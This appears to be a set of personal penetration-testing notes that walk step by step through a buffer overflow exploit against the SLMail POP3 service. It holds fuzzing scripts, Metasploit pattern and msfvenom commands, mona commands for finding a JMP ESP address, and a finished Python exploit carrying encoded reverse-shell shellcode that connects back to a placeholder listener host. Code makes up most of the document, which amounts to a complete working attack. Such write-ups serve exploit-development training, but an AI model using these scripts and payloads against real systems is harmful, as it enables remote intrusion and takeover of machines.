Windows

Related

General

Links, exploits

• Buffer overflow - Hacker's Grimoire

• The Grey Corner: An Introduction to Fuzzing: Using SPIKE to find vulnerabilities in Vulnserver

Example: SLmail

1. Check approx. buffer length by sending A's in steps of 200s or so

#!/usr/bin/python
import socket

# Create an array of buffers, from 1 to 5900, with increments of 200.
buffer=["A"]
counter=100
while len(buffer) <= 30:
	buffer.append("A"*counter)
	counter=counter+200

for string in buffer:
	print "Fuzzing PASS with %s bytes" % len(string)
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect(('<ip>',110))
	s.recv(1024)
	s.send('USER test\r\n')
	s.recv(1024)
	s.send('PASS ' + string + '\r\n')
	s.send('QUIT\r\n')
	s.close()

python 01_CheckApproxBufferLength.py

Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes

1. Check exact buffer length Create unique buffer with the last working length (2700)

msf-pattern_create -l 2700

Alternative:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9'
try: 
	print "\nSending evil buffer..."
	s.connect(('<ip>',110))
	data = s.recv(1024)
	s.send('USER username' +'\r\n')
	data = s.recv(1024)
	s.send('PASS ' + buffer + '\r\n')
	print "\nDone!." 
except:
	print "Could not connect to POP3!" 

Immunity Debugger Register view with EIP address

msf-pattern_offset -l 2700 -q 39694438

Alternative:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438

[*] Exact match at offset 2606

-> buffer = "A"*2606 + "B"*4 + "C"*90

1. Increase buffer Shellcode needs around 350-400 bytes

buffer = "A"*2606 + "B"*4 + "C"*4 + "D"*(3500 - 2606 - 4 - 4)

-> Verify, the app crashes in a similar way and check the length of D's

Target: EIP -> B's, ESP -> D's (or ECX?)

TODO: Write this in a nicer way, like:

filler = "A" * 2606
eip = "B" * 4
offset = "C" * 4
shellcode = "D" * (3500 - len(filler) - len(eip) - len(offset)

buffer = fillter + eip + offset + shellcode

1. Identify bad chars

#!/usr/bin/python
import socket 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
) 

buffer="A"*2606 + "B"*4 + badchars 
try:
	print "\nSending evil buffer..."
	s.connect(('<ip>',110))
	data = s.recv(1024)
	s.send('USER username' +'\r\n')
	data = s.recv(1024)
	s.send('PASS ' + buffer + '\r\n')
	s.close()
	print "\nDone!"
except:
	print "Could not connect to POP3!"

1. Check where all the A's are?  
2. Right click ECX -> Follow in Dump  
3. Check which is the last char displayed from our sequence of ascii chars  
-> remove this char from the sequence and run it again until there are no more bad chars  

1. Find a JMP ESP instruction

!mona modules

-> look for a module without any BO-protections in place (like DEP or ASLR)

Find the JMP ESP instruction in the module

!mona find -s "\xff\xe4" -m "slmfc.dll"

-> choose a match, that does not contain bad chars

Reverse the bytes (due to little endianess) -> \x8f\x35\x4a\x5f

1. Generate shell code

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1337 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"

1. Put it all together

#!/usr/bin/python
import socket 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

shellcode = ("\xbf\x41\xa7\x91\x24\xda\xc0\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x7a\x12\x03\x7a\x12\x83\xab\x5b\x73\xd1\xd7\x4c\xf6"
"\x1a\x27\x8d\x97\x93\xc2\xbc\x97\xc0\x87\xef\x27\x82\xc5\x03"
"\xc3\xc6\xfd\x90\xa1\xce\xf2\x11\x0f\x29\x3d\xa1\x3c\x09\x5c"
"\x21\x3f\x5e\xbe\x18\xf0\x93\xbf\x5d\xed\x5e\xed\x36\x79\xcc"
"\x01\x32\x37\xcd\xaa\x08\xd9\x55\x4f\xd8\xd8\x74\xde\x52\x83"
"\x56\xe1\xb7\xbf\xde\xf9\xd4\xfa\xa9\x72\x2e\x70\x28\x52\x7e"
"\x79\x87\x9b\x4e\x88\xd9\xdc\x69\x73\xac\x14\x8a\x0e\xb7\xe3"
"\xf0\xd4\x32\xf7\x53\x9e\xe5\xd3\x62\x73\x73\x90\x69\x38\xf7"
"\xfe\x6d\xbf\xd4\x75\x89\x34\xdb\x59\x1b\x0e\xf8\x7d\x47\xd4"
"\x61\x24\x2d\xbb\x9e\x36\x8e\x64\x3b\x3d\x23\x70\x36\x1c\x2c"
"\xb5\x7b\x9e\xac\xd1\x0c\xed\x9e\x7e\xa7\x79\x93\xf7\x61\x7e"
"\xd4\x2d\xd5\x10\x2b\xce\x26\x39\xe8\x9a\x76\x51\xd9\xa2\x1c"
"\xa1\xe6\x76\xb2\xf1\x48\x29\x73\xa1\x28\x99\x1b\xab\xa6\xc6"
"\x3c\xd4\x6c\x6f\xd6\x2f\xe7\x9a\xf4\x18\xf2\xf2\xf8\x66\xf9"
"\x3b\x74\x80\x6b\x2c\xd0\x1b\x04\xd5\x79\xd7\xb5\x1a\x54\x92"
"\xf6\x91\x5b\x63\xb8\x51\x11\x77\x2d\x92\x6c\x25\xf8\xad\x5a"
"\x41\x66\x3f\x01\x91\xe1\x5c\x9e\xc6\xa6\x93\xd7\x82\x5a\x8d"
"\x41\xb0\xa6\x4b\xa9\x70\x7d\xa8\x34\x79\xf0\x94\x12\x69\xcc"
"\x15\x1f\xdd\x80\x43\xc9\x8b\x66\x3a\xbb\x65\x31\x91\x15\xe1"
"\xc4\xd9\xa5\x77\xc9\x37\x50\x97\x78\xee\x25\xa8\xb5\x66\xa2"
"\xd1\xab\x16\x4d\x08\x68\x26\x04\x10\xd9\xaf\xc1\xc1\x5b\xb2"
"\xf1\x3c\x9f\xcb\x71\xb4\x60\x28\x69\xbd\x65\x74\x2d\x2e\x14"
"\xe5\xd8\x50\x8b\x06\xc9") 

# offset + JMP ESP address + nop padding + shellcode
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90"*16 + shellcode 
try:
	print "\nSending evil buffer..."
	s.connect(('<ip>',110))
	data = s.recv(1024)
	s.send('USER username' +'\r\n')
	data = s.recv(1024)
	s.send('PASS ' + buffer + '\r\n')
	s.close()
	print "\nDone!"
except:
	print "Could not connect to POP3!"

Additional stuff and improvements

Locating space for shellcode

Need about 350-400bytes -> increase buffer (if needed)

Find opcode

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
jmp esp

-> FFE4

Improving the exploit

Using EXITFUNC=thread to only crash the affected thread

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Troubleshooting

• Run Immunity Debugger as Administrator

• Restart Immunity Debugger after each "crash"

• Don't forget to hit "Run" (attach puts it in Paused state)

• Always attach Immunity Debugger, as somehow SLMail did not crash (first stage, finding the approx. buffer length) without it 0_o

• No bad chars in JMP ESP address